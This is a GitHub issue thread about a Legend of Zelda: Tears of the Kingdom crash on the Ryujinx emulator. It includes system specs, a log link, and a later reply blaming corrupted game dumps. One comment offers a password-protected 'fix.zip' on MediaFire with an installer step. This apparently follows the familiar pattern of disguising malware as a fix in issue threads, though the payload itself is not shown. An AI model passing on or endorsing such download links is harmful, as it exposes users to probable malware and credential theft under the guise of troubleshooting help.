### ISSUE TITLE
Tears of the Kingdom, hyrule field crash

### ISSUE THREAD

**Issue by Ewenomi** [Ryujinx/Ryujinx-Games-List#5045]
### Game Name

Legend of Zelda: Tears of the Kingdom

### Game Update Version

1.2.1

### Emulator Build Version

1.1.1379

### Graphics Backend

Vulkan

### Hardware Specs

- ##### CPU: i7-12700KF
- ##### GPU: NVIDIA RTX 3060
- ##### GPU Driver version: 560.94
- ##### RAM: 80GB

### Game State

Ingame, crashes when reaching a certain position on the field. I haven't attempted to navigate and produce a perimeter. Hyrule field position is indicated in log. Occurs shortly after heading towards first marker after jumping from Sky to Hyrule field.

### Log File

[Ryujinx_1.1.1379_2024-08-25_21-18-13.log](https://github.com/user-attachments/files/16744177/Ryujinx_1.1.1379_2024-08-25_21-18-13.log)

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by MetrosexualGarbodor** [comment]
[Your game files are corrupted](https://github.com/Ryujinx/Ryujinx/wiki/FAQ-and-Troubleshooting#-crashing-after-booting-a-game-or-crashing-after-applying-an-update-with-e-hleosthread8-application--unhandled-exception-caught-systemreflectiontargetinvocationexception-exception-has-been-thrown-by-the-target-of-an-invocation-----libhaccommonhorizonresultexception-resultfsnonrealdataverificationfailed-2002-4604-hash-error), dump them again from your Switch.

In the future, please use Discord for help.
